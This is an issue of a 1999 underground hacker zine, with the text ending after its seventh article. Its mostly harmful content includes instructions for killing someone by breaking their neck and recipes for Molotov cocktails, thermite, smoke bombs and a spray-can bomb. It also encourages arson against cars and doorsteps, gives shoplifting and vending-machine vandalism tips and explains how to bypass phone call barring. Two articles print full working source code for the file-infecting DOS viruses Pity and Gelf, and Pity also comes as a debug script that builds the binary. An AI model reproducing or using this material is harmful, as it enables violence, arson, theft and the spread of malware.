___________ _______________________________________ ", / / ___ _.-'' '. / / / / /NDERGROUND> .' _ | / / / / / _______ / / \ / / / / / / / ___ \ / __/_.' / / / / / / / /__/ / /.-'' .' / / / / / / _____.' /_________..-' / / / / /___/ /_ / / / / / '.____ __/ / / | / / / / / / \ | _.' /__/ERIODICAL> / / '-._'..-'_______________________________/__..-' We're On The Up And Up :..:..::..Issue..::..:..: Issue 7 November 1999 :..:..::..Staff..::..:..: CrossFire - Editor ergophobe (Walrus) - Editor Mirage - Writer Devlin - Writer Pyr0 Proxy / PoZ-i - Writer Website http://members.xoom.com/under_p :..:..::..Email..::..:..: under_p@yahoo.com :.:.Alternative Hosts.:.: http://www.swateam.org http://surf.to/maquishacker http://surf.to/awol4life http://mobboss.dragx.cx http://walrus.bog.net http://packetstorm.securify.com :..::..Introduction.::..: <*> Welcome to Up7! A lot of things have changed this month, 3 More people (Mirage, Devlin And Pyr0 Proxy) have joined the Staff. Walrus Has also Been promoted to co-editor because he kept coming up with such good ideas it was the most sensible thing to do. Darkflame Has Been kicked from the Up staff because of inactivity. We Didn't get ANY mails concerning Up6 in the past month, so get your asses into gear and tell us what you think. I'm sorry if the issue was released a bit late this month, this month I've had to chase people to write us articles (more than usual), heck - we even have a couple of articles from HuSoft (damned good articles too) who was the main 'character' in last month's IP Spanking Feature. Official Cool Person Of The Month: Phreakazoid - For giving me a nice shiny bt internet dialup :) Right, on with the mag. Please send feedback and articles to: under_p@yahoo.com - Most articles sent to us do get included, and you can plug your website at the end of it if you want. :..::.:..Contents.:.::..: <*> 0 - Introduction And Contents...: CrossFire <*> 1 - Unarmed Hand To Hand Combat.: Pyr0-Proxy <*> 2 - Tracking Corner.............: Ergophobe <*> 3 - Random Anarchy..............: PoZ-i <*> 4 - Networking..................: Mirage <*> 5 - BT Call Barring.............: CrossFire <*> 6 - Pity Virus..................: EXE-Gency <*> 7 - Gelf Virus..................: EXE-Gency <*> 8 - Hacking Novell Netware......: HuSoft <*> 9 - Password Security...........: HuSoft <*> 10 - Tracked Music Reviews.......: Walrus & CrossFire <*> 11 - 0800 Scans..................: Ergophobe <*> 12 - Eggdrop Hacking.............: Mob Boss <*> 13 - Free Calls with Ureach......: Mob Boss <*> 14 - Playstation Piracy..........: CrossFire <*> 15 - Disclaimer and End..........: UP Staff _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: Unarmed Hand To Hand Combat Part 1 - Attacking By Pyr0-Pr0xy First of all, let me say that none of the techniques described here should be used on innocent, defenceless people. Unless you don't like them. "Attack is the best form of defence" - Sometimes this can be true, and sometimes you might just want to kick the shit out of someone. The following text should be useful. There are seven areas of your body, which can be used to attack another person: 1) The Knee 2) The Heel of the foot 3) The ball of the foot 4) Middle finger and ring finger end 5) Elbow 6) The knife edge of hand/little finger 7) The Fist/side fist A fundemental rule, which has to be observed after an attack using any part of the body, is that you must immediately bring back the attacking limb to its starting point. E.g, when you hit someone, you should make contact, then bring your arm back. If you don't, it greatly reduces the effectiveness of the attack. When attacking someone, (in defence of course), there are certain areas of the body that you should always aim to hit. A blow to one of these areas can bring down a man much quicker than repeated blows to an inneffective area. They are: The top of the head - not very useful, unless you have a baseball bat. Between the Eyes - Can be poked, or struck with the fist. Causes pain and can break the neck if done with sufficient force. The temples - A sideways blow, with the little finger edge of the hand, to either temples, or both can cause unconsciousness, and even death. Behind the ears - If your opponent is already on the ground, and at your mercy, you can inflict great pain by pressing the knuckle of you second finger into the flesh part just behind the ear lobe The upper lip - This can be hit with the little finger edge of the hand, and with the fist, and causes extreme pain, due to a bundle of nerves being close to the skin Chin - Can be attacked with the fist or elbow, and can knock someone out if hit with enough force Neck - If you manage to hit someone in the throat, just above the voice box, it tends to fold the windpip inwards, which isn't a good thing for the owner of the throat. Pit of the stomach - This spot can be hit with the fist, elbow, knee or can be kicked. It is one of the most vunerable sopts on the body. When kicking your opponent in this spot, keep the toes curved and deliver the blow with the ball of the foot. Withdraw the foot instantly, to delvier maximum force. The Lower ribs - This hurts like hell, and can cause internal damage. Stuck with the foot, and the fist. About 5cm below the navel - Kick this. Hard. It Hurts. Lots. Testicles - Does this really need explanation???!?! Knee Joint - It can be kicked, from the side, with a downward motion, which snaps the joint. Generally, there is not many technical techniques that can be used when attacking, that actually work. Your best bet is to attack first, attack fast, and attack hard. Don't stop attacking until your opponent is on the floor, and not moving, and you will be safe from retalliation. Surprise attacks work best, as your opponent has little or no time to prepare himself. If you *really* don't like someone ;-) , then it is quite simple to kill someone with your bare hands. The main area of weakness is the head and neck. The skull is designed to take shocks fowards and backwards, not sideways. So, a violent sideways blow can, if delivered with sufficient force, kill a person. It should at least render them unconscious. Breaking a persons neck is a very quick and easy way to send them to their doom. The easiest way to acheive this from behind is to wrap your right arm around around the right side of their head, across the forehead, grasping the left side of their head, and with your left arm, go across your body, and grab the back, right side of their head. Move your hand closer together, with a violent lunge, twisting their head with a sideways motion. Alternatively, you can place your left hand in the pit of their neck, then grab their forehead with your right hand. Push forwards with your left, and backwards with your right. Finally, let me just say that when attacking, you should always look for weak spots on your opponents body(s). Each person will have a weak spot, some place on their body that you can exploit. Next time, I will be dealing with how to cover up *your* weak spots, and how to react to, and defend from different attacks. _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: Tracking corner ~~~~~~~~~~~~~~~ By: ergophobe Hopefully this will turn into a regular feature as a kind of forum for general information/rants and raves about tracking. The basic theme I'm going to be exploring this month is the idea of realism within tracked music. Up until the advent of computers, musicians have been very limited in what they can do with their music. Simple things such as having only two arms have greatly influenced the way that instruments and consequently music have been structured. But all that has changed. Using a tracker, we can now have things which were never possible before such as snare fills and hihats at the same time, or playing 3 notes simultaneously on a flute. This has dramatically shaped the music of our time. Many of the sounds which are used in music today, particularly trance, are only possible because of synthesisers and the sounds and effects which these can create. The reason that we have music such as hardcore, techno and drum 'n' bass is because we can. Music such as this is very technology driven, and advances in the technology which is available are being taken advantage of all the time. However this is not always a good thing. The classic example is the fact that timestretching samples is now incredibly easy has probably lead to the huge increase in the number of ripoffs being released at the moment in the hardcore scene. Less obvious is the fact that people often forget that these limitations have been lifted. When tracking a piece of techno or hardcore, just about anything goes in terms of physical limitations of your performers. The only thing you need to worry about is a nice DJ friendly intro and outro. However when tracking a piece of heavy metal, you've got to remember that your drummer can not play 2 bassdrums and pedal a hi-hat at the same time because he doesn't have three legs. In this respect, you need to think very carefully about the way that you use a tracker. Even down to researching the range of notes that certain instruments can play. For example, piccolo's simply do not play low notes. There is an additional aspect to the idea of physical limitation, which is the idea of speed. You have to think about exactly how fast it is possible for a person to play. A piece at 350bpm may work fine in a tracker, but when you give it to real musicians to play, its simply not going to work. Finally it is important to consider what variety of the instrument is most appropriate. For most general saxophone parts, alto or tenor is fine, but for those higher notes, soprano is more effective, and for the really low bass parts, a baritone sax is better. To add extra touches of realism, it is worth thinking about how the piece would actually be played. A pianist will not strike each key with exactly the same velocity every time, there will be slight variations in volume. It is also rare that a saxophonist will play each note exactly the same and completely crisp. If you listen very closely, you will notice that it is common for the note to bend slightly. So when you're tracking, take into account the style you are actually composing in, the instruments you are using and what effect you are actually trying to create with them. ergophobeRandom Anarchy by PoZ-i Fun with Fire and Smoke ----------------------- This may sound obvious, but *much* fun can be had with fire. You'd be Surprised at the amount of things that burn exceptionally well, especially with a little help. Here are some ideas. #1) Flame Throwers Take any spray can; hold a lighter by the nozzle, and spray! #2) Car Mayhem Light something, throw it under a car, and wait for the owner to come running! #3) Flour Fire-ball Get a candle and some flour. Light the candle and put some flour in your hand. Try various ways of getting the flour to leave your hand and become dust over the candle flame. The enormous surface area allows all the tiny dust particles to burn all at about the same time creating a fireball effect. #4) Molotov Cocktail This now famous device is easy to make, but deadly when used. Simply take a glass bottle (a milk bottle will do fine) and fill with 3/4 petrol or lighter fluid, and 1/4 oil. Shake this mixture well. Dip a piece of torn rag into the mixture, and stuff it into the neck of the bottle. If no rags are available, a tampon works just as well. Light the rag, then throw the bottle, making sure it smashes. The oil makes the mixture stick to surfaces. #4) Fire Fudge Take some flour, and mix it in with petrol. The resulting mixture should have a dough like consistency. You could throw it at a window or wall, and then light, or you could make a modified molotov cocktail with it. (see above) #5) Carrier Bags Take some carrier bags, and stuff then into a crack in a window, or on someone's doorstep. Burn them, and they melt to form a sticky gooey mess that is very hard to remove! #6) Thermite This one needs some before hand preparation, so plan a week ahead. Thermite is basically a material, that when lit, takes advantage of the extremely hot (2200 degrees C) exothermic reaction that is produced when finely powdered aluminum filings are mixed with Ferric Oxide (rust) The two materials should be mixed at a 50/50 ratio, and gently heated until the iron glows red hot. The resulting material, when lit, will burn through most materials, including carbonized steel! It is very difficult to light however, and the best way to do so is using a magnesium strip. #7) Smoke! This crude but effective smoke bomb will produce *a lot* of smoke when made correctly. Simply mix together Potassium Nitrate (also known as Salt Petre) and sugar, in the ratio 3:1. Add some sulfur for some more smoke if necessary. Heat the mixture in a tin can gently, as you don't want a whole batch of this stuff going off in your kitchen. Heat it until the sugar melts. You should now have a white mixture, with sticky lumps in it. Simply throw a camping match in the tin to light! A fuse is recommended, as the amount of smoke this baby produces will turn heads. I know from experience that this is *very* effective! #8) More smoke! This is another way to make lots of smoke, very easily. Simply mix 6g of zinc powder with 1g of sulfur powder. Stick a red-hot wire into the mixture, and stand back, as much smoke is produced. #9) Spray-can bomb. This relatively small explosive is perfect if you are short of any 'proper' explosive materials. It uses the gases inside a spray can (butane, propane) to create an mild explosion. You will need: 1) a spray can (WD-40 is best, as the oil is also flammable, but any old deoderant can will do) 2) firelighters (if no firelighters are avaiable, then a bundle of rags soaked in petrol or lighter fluid would work) 3) Something to light it with 4) a large elastic band or piece of string Take the cap and the nozzle off the can, then using the elastic band or string, tie the fire lighters, or your other flammable material to either side of the can. Now light the flammable material, and run! you will have around 30 secs to a minute, depending on what materials you used. When the can heats up enough, it will explode, lighting the contents, and producing a loud bang!, accompanied by a reasonable fireball. The more cans that are used, the louder, and larger the explosion! Stealing -------- Stealing stuff from shops if surprisingly easy, especially if you have a mate to help. Most shop keepers are so dumb they wouldn't notice if you took the till away from under their noses. however, People don't notice stuff, but camera's do. *Never* take anything when in view of a camera, (unless you are on holiday in Germany of course) unless you want to get caught. Understand though, there are different types of camera. First there are the ones that are totally fake. These are tricky to spot, but they usually have a 'realistic' flashing light. My advice is don't risk it, there are easier places to rob from. Leave any cameras alone, unless they are the type that don't actually record anything, they just let the shop keeper look at the other end of the shop. If these are in place, simply get a friend to distract the dick behind the counter, while you get the stuff. This is probably the best method to steal anything. Get a friend or friends to go in one area of the shop, and look really suspicious. All attention will be diverted to them, while you take the stuff. When taking stuff, the best clothes to wear, are combat trousers (the type with really big pockets in the legs), and any jacket with many pockets, especially the hidden type. Also wear a cap, so that if you are accidentally caught on camera, it will be harder for them to recognize you. If you do happen to notice a shopkeeper following you after you have taken something, simply replace the items on a shelf, any shelf. If they take you in when you still have stuff in your pockets, but you haven't left the shop, simply say that you haven't had the chance to pay, and that you had every intention of paying. Even if you get prosecuted, they won't have any kind of a case against you, as you could have still paid. Coin Vending Machines --------------------- This is an idea to fuck over a coin vending machine: Most modern machines work by passing an electric current through the coin, and judging the value of it by the amount of resistance it offers. So what would happen if you were to pour a salt-water solution into the coin slot? The whole fucking machine would start throwing out money and chocolate randomly! Try it! You'll Like It! A Series On Networking 1) Who is that guy Mirage ? 2) Networking Hello readers of UP, this is my first article for UP and I hope you like it. To those of you who don't know me, you would if you hang on the krash server shame on you. Well you can catch most of us there on the weekend on krash.dyndns.org 6667. These are some of the popular channels #apt, #hdc, #krash, #cocytusUK but keep your eyes open for others. Well some of you are probably wondering who is this guy Mirage ? Well erm... in a nutshell i'm a person very curious about computer security issues and generally anything to do with comuters. Ok my first article will be on networking from the basics to more advanced techniques used; from my experience anyway. This will be in a long line of articles so stay tunned! -Mirage- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=--=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= To start of the series of tutorials we are first going to take a beginners look at network topologies: My definition of a network topology is that it is a description of the layout of communication medium (cabling), and devices on a network (printers, peripheral etc). In this article I will cover the following topologies: point to point, mesh, bus, ring, star and hybrid. Point to point This is a very simple one basically you have two computers connected to each other via communication media. Obviously routing is not necessary, as this is a simple "point to point" topology. It's main use is for file transferring or two player Quake. This topology is not really used these days but I thought I'd mention it. Mesh A Mesh topology basically provides each computer on the network with a point to point connection. In my experience Mesh topologies most of the time can provide fast, reliable data transmission. The reason why Mesh aren't so widely used is for the simple reason that they waste communication channels; which in a growing company would very impratical. Despite the advantages of having a dedicated connection the wasting of communication channels just isn't practical. Bus This is the most commonly used well from what i've seen. A Bus topology as it's name suggests uses a single communication medium (usually coaxial) to transmit data. This works pretty simply e.g. erm... short links of cable tap directly into the main Bus simple as I said. At each ends of the Bus are terminating devices which prevent echoing when the signal reaches the end of the main Bus. If you don't know what echoing is well its simple it would produce the effect of multiple signals on the main Bus. I remember a friend had set up a network using this topology and asked me to see why it wasn't working it was so easy to fault find, it was just a badly made cable that wasn't built right. He said he spent over 3 hours trying to fix the network. The twat even formatted all the computers and started again DOH! So remember to check you cabling first. Ring This is a real irritating network if one computer goes down so do all of them. Righty then well this topology connects computers in a continuous loop. On the upside signal quality on these networks is good as the signals are retransmitted by each computer to the next computer and so on the signal keeps getting relayed. The reason why I say this is an upside is because there is very little loss in signal quality as the signal is always being replayed. Star Things start to get more interesting here with the introduction of hubs in networks. In a Star topology the cabling branches out from a central hub. Then the hub transmits signals from computer to computer, nice huh. If your not a tight git and you invest in a decent hub you can pick one up that will increase the signal quality over the network and wait for it yes you guessed it keep portions of the network in operation should a cable break or other problem occur. There not that expensive to put together actually and fault finding is so easy. On the downside it has a low data rate. Hybrid In my experience I have found that Hybrid topologies can be very tricky to establish and manage. Well Hybrid topologies have to combine two or more to be considered a Hybrid topology. A lot of wide area network's (WAN's) use this topology as they have the ability to connect several local area network's (LAN's. Oh yeah and they can be dame expensive and trouble shooting can really be dawnting. Well readers thats it for this issue stayed tunned for the next issue which we will be looking at communication medium. -Mirage- UIN:54387080 E-mail:dk306@hotmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Hope You Enjoyed It! Mirage | _> _ _ ___ ___ ___| __><_> _ _ ___ | <__| '_>/ . \<_-<<_-<| _> | || '_>/ ._> `___/|_| \___//__//__/|_| |_||_| \___. Presents.... Bypassing BT Call Blocking v1.0 This file comes about after a phone conversation with Walrus, in which he told me someone had emailed him asking about getting past Bt Call Blocking. Because of a certain £225 Phone Bill, my Parents decided to put Call Blocking on our phoneline. Bastards. From What I can gather, Call Barring works by The Line owner entering a pin (duh), and after which a connection seems to be made to a BT Number, on which a fake dial tone is made. One Way I have found to circumvent this, is If you have a mobile phone or similar, call Up the 17070 Outdial that Ergophobe Mentioned last month (0800 373983) , and select the Cable Pair Identification Feature. Cable Pair Identification basically is a feature that Engineers can use to test lines, cutting off all traffic to the line in the process (And no It doesn't work on freeserve ). From My Findings, this temporarily allows you to make a call, but you have to be quick, because the barring comes back on pretty soon. Another, More Foolproof way to Bypass Call Barring is to try Hacking the Pin Code. From what I've found out, the pin code is 6 numbers long, but the line owner does NOT Select the pin, so don't bother trying your pets second cousins brother in law's wife's birthdate - It aint worth it. Once You've Hacked the code, your going to want to deactivate the barring (duh), and to do that you need a special code - here is a list of all the codes that activate / deactivate various things in the BT System (Thanks To EXE-Gency For These): 141 withhold number 1471 gives details of last number to call you 1474 call the last number to call you. 1470 un-withhold your number if you have a perm-=Withhold- 150 - BT Customer Service 151 - BT Fault Reporting 155 - International Operator 153 - International Directory Enquiries 192 - UK Directory Enquiries *21* - Divert all calls *#21# - Check divert (high tone on/low tone off) #21# - cancel divert *261# - Barrs all Incoming calls *#261# - Check incoming call barring #261# - Cancel incoming call barring *34x# - Switch ON Call Barring (where x = option number) *#34x# - Check Call Barring #34x*PIN# - Cancel Call Barring option #34*PIN# - Cancel All Call Bars Call Bar Options - 1 - bars almost all calls/allows 999/151 2 - bars calls starting with "0" 3 - bars international calls 4 - bars calls starting with 1 except 151 5 - bars calls using * 6 - bars premium rate adult services 7 - bars all premium rate services *41# - Switch Call Waiting on #43# - Switch Call Waiting off *#43# - Check Call Waiting status (high tone on/low tone off) *52# - Details of last outgoing call (Gives number) #52# - Delete details of last call *54# - Redial last outgoing call. *61* - Divert if no reply *#61# - Check divert #61# - Cancel divert on no reply *62*xxxxxxxxx# - Divert on NOT AVAILABLE (Currently not installed *65*xxxxx# - Not sure what this does. (need pin number) *66*xxxxxxxxx# - Divert on No Reply and Busy.. *67* - Divert if busy *#67# - Check divert #67# - Cancel divert on busy Yeah, Short File I know, but I hope you find it useful. Please Send All Feedback / Flames / Death Threats / Bribes to: crossfire@antionline.org . _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: The Pity Virus By EXE-Gency Comment # ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛÄ¿ Û T H E ( P I T Y ) V I R U S Û ³ Û B Y E X E - G E N C Y Û ³ ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Okay, this the the very first non-overwriting virus I wrote. Here are some details about the Pity virus: Name : Pity Author : EXE-Gency Size : about 500 bytes (file growth) Type : Non-resident, non-overwriting, non-encrypted. Targets : *.COM Stealth : Restores files attributes, time and date stamp General : Infects all files in the current directory. Searches current directory with FindFirst/Next functions. Won't re-infect files. Won't infect files whose first two bytes add up to 167 (such as MZ or ZM in .EXE files) Won't infect files smaller than 500 bytes (1F4h.) Won't infect files larger than 60,000 bytes (EA60h.) Won't infect files whose name is recognised by the filemask CO*.COM so as not to infect the file COMMAND.COM. Uses the JMP instruction (E9h) as it's infection marker. Puts the DTA (Disk Transfer Area) at the bottom of the file during execution, so that the parameters to .COM files are not overwritten when called to FindFirst (4Eh) and FindNext (4Fh) functions. To assemble type: TASM PITY.ASM TLINK /T PITY.OBJ DO NOT RUN THE PITY.COM FILE IT IS THE VIRUS! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ # Prog segment assume cs:Prog, ds:Prog org 0100h ; Leave room for PSP Begin: db 0E9h, 00h, 00h ; JMP The Start ; (1st generation only) TheStart: call Get_Delta ; Push IP Get_Delta: pop bp ; Pop IP into BP sub bp, offset Get_Delta ; Get File Size lea si, [bp + Buffer] ; SI points to buffer mov di, 0100h ; DI points to 1st byte movsb ; Move 1 byte movsw ; Move 1 word (2 bytes) mov ah, 1Ah ; Set DTA lea dx, [bp + TheEnd] ; To end of virus int 21h ; Do it! mov ah, 4Eh ; FindFirst lea dx, [bp + FileMask] ; DX points to *.COM mov cx, 0007h ; File attribs FindNext: int 21h ; Do it! jnc $+5 ; No error? Continue jmp ReturnToHost ; No more files! mov ax, 4301h ; Set attribs mov cx, 0000h ; To zero lea dx, [bp + TheEnd + 1Eh]; DX points to FileName int 21h ; Do it! jnc $+5 ; No error? Continue jmp FindMore ; Error? Find another mov ax, 3D02h ; Open file R/W lea dx, [bp + TheEnd + 1Eh]; DX points to FileName int 21h ; Do it! jnc $+5 ; No error? Continue jmp FindMore ; Error? Find another xchg ax, bx ; BX=File Handle mov ah, 3Fh ; Read file mov cx, 03h ; 3 bytes lea dx, [bp + Buffer] ; Put in buffer int 21h ; Do it! lea cx, word ptr [bp + offset Buffer] ; Put first 2 bytes into CX add cl, ch ; Add together cmp cl, 0A7h ; Is it MZ or ZM? je RestoreAttr ; Yep, close file cmp byte ptr [bp + Buffer], 0E9h ; Infected? jne $+5 ; No, continue jmp RestoreAttr ; Yep, restore+close cmp word ptr [bp + TheEnd + 1Eh], 'OC' ; COMMAND.COM file? jz RestoreAttr ; Yep, close file mov ax, 4202h ; Goto EOF mov cx, 0000h mov dx, 0000h int 21h ; Do it! sub ax, 03h ; reduce by 3 mov word ptr [bp + JumpBytes+1], ax ; Append offset to JuMP instruction cmp ax, 01F4h ; Less that 500 bytes? jb RestoreAttr ; Yep! Find more cmp ax, 0EA60h ; More than 60,000? ja RestoreAttr ; Yep! Find more mov ah, 40h ; Write file mov cx, TheEnd - TheStart ; CX = Virus size lea dx, [bp + TheStart] ; Beginning of virus int 21h ; Do it! mov ax, 4200h ; Set file pointer to start of file mov cx, 0000h mov dx, 0000h int 21h ; Do it! mov ah, 40h ; Write file mov cx, 03h ; 3 bytes lea dx, [bp + JumpBytes] ; DX points to buffer int 21h ; Do it! RestoreAttr: mov ax, 4301h ; Set file attribs mov cx, word ptr [bp + TheEnd + 15h] ; From DTA lea dx, [bp + TheEnd + 1Eh]; DX points to filename int 21h ; Do it! RestoreTDStamp: mov ax, 5701h ; Set file time/date mov cx, word ptr [bp + TheEnd + 16h] ; from DTA mov dx, word ptr [bp + TheEnd + 18h] ; from DTA int 21h ; Do it! CloseFile: mov ah, 3Eh ; Close file int 21h ; Do it! FindMore: mov ah, 4Fh ; Find Next jmp FindNext ; Call int 21h ReturnToHost: mov ah, 2Ch ; Get time int 21h ; Do it! cmp dl, 00h ; sec=0? je DisplayMessage ; Yep, display message Restore: mov ah, 1Ah ; Set DTA mov dx, 80h ; Back to ofs 0080h int 21h ; Do it! mov ax, 0100h push ax ; Push 100h ret ; Ta ta! DisplayMessage: mov ah, 09h ; Display message lea dx, Message ; DX holds offset int 21h ; Do it! int 20h ; Return to OS FileMask db '*.COM', 00h ; ASCIIZ File Mask Message db '[Pity] Virus ' db 'Written by EXE-Gency!' db 0Dh, 0Ah, '$' ; Message Buffer: db 90h, 0CDh, 20h ; NOP, INT 20h JumpBytes db 0E9h, 00h, 00h ; JMP offset TheEnd: ; Where to put DTA Prog ends ; Fin! end Begin ; Fin II ! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ If you don't have TASM/TLINK, just copy and past the debug script below to a new text file and then type: debug < filename and a file called pity.com will appear. This is the virus. N PITY.COM E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 8D B6 23 02 BF E 0110 00 01 A4 A5 B4 1A 8D 96 29 02 CD 21 B4 4E 8D 96 E 0120 F8 01 B9 07 00 CD 21 73 03 E9 AE 00 B8 01 43 B9 E 0130 00 00 8D 96 47 02 CD 21 73 03 E9 98 00 B8 02 3D E 0140 8D 96 47 02 CD 21 73 03 E9 8A 00 93 B4 3F B9 03 E 0150 00 8D 96 23 02 CD 21 8D 8E 23 02 02 CD 80 F9 A7 E 0160 74 52 3E 80 BE 23 02 E9 75 03 EB 48 90 3E 81 BE E 0170 47 02 43 4F 74 3E B8 02 42 B9 00 00 BA 00 00 CD E 0180 21 2D 03 00 3E 89 86 27 02 3D F4 01 72 26 3D 60 E 0190 EA 77 21 B4 40 B9 26 01 8D 96 03 01 CD 21 B8 00 E 01A0 42 B9 00 00 BA 00 00 CD 21 B4 40 B9 03 00 8D 96 E 01B0 26 02 CD 21 B8 01 43 3E 8B 8E 3E 02 8D 96 47 02 E 01C0 CD 21 B8 01 57 3E 8B 8E 3F 02 3E 8B 96 41 02 CD E 01D0 21 B4 3E CD 21 B4 4F E9 4B FF B4 2C CD 21 80 FA E 01E0 00 74 0C B4 1A BA 80 00 CD 21 B8 00 01 50 C3 B4 E 01F0 09 BA FE 01 CD 21 CD 20 2A 2E 43 4F 4D 00 5B 50 E 0200 69 74 79 5D 20 56 69 72 75 73 20 57 72 69 74 74 E 0210 65 6E 20 62 79 20 45 58 45 2D 47 65 6E 63 79 21 E 0220 0D 0A 24 90 CD 20 E9 00 00 RCX 0129 W Q _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: The Gelf Virus By EXE-Gency Comment # ÉÍÍÍÄÄ ú ú ÄÄÍÍÍ» º ( GELF ) º º b y E X E - G e n c y º ÈÍÍÍÄÄ ú ú ÄÄÍÍͼ Another old virus. The only difference between this and the Pity virus is that it's encrypted. Virus Name : Gelf Author : EXE-Gency Size : 1B6h bytes (file growth) Type : Non-overwriting, non-Resident, encrypted. Targets : *.COM files Stealth : Infects files with any attributes. Restores file's time/date stamp and attributes. General : Infects all files in the current directory and works it's may to the root with '..' calls. (Also restores original directory.) If it's the 1st of January, some details about Gelf will be displayed on the screen. The computer will then wait for a key press then re-boot the machine. Assembling : TASM GELF.ASM TLINK /T GELF.OBJ DO NOT RUN THE GELF.COM FILE IT IS THE VIRUS! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ # prog segment ; Setup segments assume CS:prog, DS:prog; CS+DS in same seg org 100h ; .COM file Main: db 0E9h, 00h, 00h ; Jump to VirusStart VirusStart: call GetDelta ; Get DeltaOffset GetDelta: pop bp ; Pop IP sub bp, offset GetDelta ; BP=Delta Offset mov ah, 2Ah ; Get Date int 21h ; DOS Int cmp dx, 0101h ; 1st January? 1/1/?? jne NoPayload ; No -> Dont display msg mov ah, 09h ; Write string lea dx, VirusInfo ; DX points to VX info int 21h ; DOS Int mov ah, 01h ; Get Keypress int 21h ; DOS Int int 19h ; Reboot (but not in WIN95) NoPayload: call Encrypt_Decrypt ; Decrypt virus jmp RestoreOldBytes ; Restore 1st 3 bytes of host EncryptionVal dw 0000h ; Enc/Dec val (0=no encryption) WriteCode: call Encrypt_Decrypt ; Encrypt virus mov ah, 40h ; Write Virus mov cx, offset virusend-virusstart ; Virus size lea dx, [bp + virusstart] ; Start of Virus int 21h ; DOS Int call Encrypt_Decrypt ; Decrypt ret ; Return Encrypt_Decrypt:mov bx, word ptr [bp + EncryptionVal] lea si, [bp + RestoreOldBytes] mov cx, [offset Random - offset RestoreOldBytes] XORAgain: xor word ptr [si], bx inc si inc si loop XORAgain ret RestoreOldBytes:lea si, [bp + buffer] mov di, 0100h movsb movsw mov ah, 1Ah lea dx, [bp + virusend] int 21h mov ah, 47h mov dl, 00h lea si, CurrentDir int 21h FindFirst: mov ah, 4Eh lea dx, [bp + FileMask] mov cx, 0000h FindNext: int 21h jnc $ + 5 jmp DoParent mov ax, 4301h mov cx, 0000h lea dx, [bp + VirusEnd + 1Eh] int 21h jnc $ + 5 jmp FindMore mov ax, 3D02h lea dx, [bp + virusend + 1Eh] int 21h jc RestoreAttribs xchg ax, bx mov ah, 3Fh mov cx, 0003h lea dx, [bp + buffer] int 21h jc RestoreAttribs cmp byte ptr [bp + buffer], 0E9h jz RestoreAttribs mov ax, 4202h mov cx, 0000h mov dx, 0000h int 21h jc RestoreAttribs sub ax, 03h mov word ptr [bp + jumpbytes + 1], ax Random: mov ah, 2Ch int 21h add dl, dh cmp bx, 00h je Random mov word ptr [bp + EncryptionVal], bx call WriteCode mov ax, 4200h mov cx, 0000h mov dx, 0000h int 21h jc RestoreAttribs mov ah, 40h mov cx, 0003h lea dx, [bp + jumpbytes] int 21h RestoreAttribs: mov ax, 4301h mov cx, word ptr [bp + VirusEnd + 15h] lea dx, [bp + VirusEnd + 1Eh] int 21h mov ax, 5701h mov cx, word ptr [bp + VirusEnd + 16h] mov dx, word ptr [bp + VirusEnd + 18h] int 21h Close: mov ah, 3Eh int 21h FindMore: mov ah, 4Fh jmp findnext RestoreDTA: mov ah, 1Ah mov dx, 0080h int 21h mov ax, 0100h push ax ret DoParent: mov ah, 3Bh lea dx, Dot_Dot int 21h jc RestoreDir jmp FindFirst RestoreDir: mov ah, 3Bh lea dx, Slash int 21h jmp RestoreDTA FileMask db '*.com', 00h Slash db '\' CurrentDir db 64 dup (0) Dot_Dot db '..', 00h Buffer db 0CDh, 20h, 00h JumpBytes db 0E9h, 00h, 00h VirusInfo db '[Gelf] Virus written by EXE-Gency!$' VirusEnd: Prog ends end main 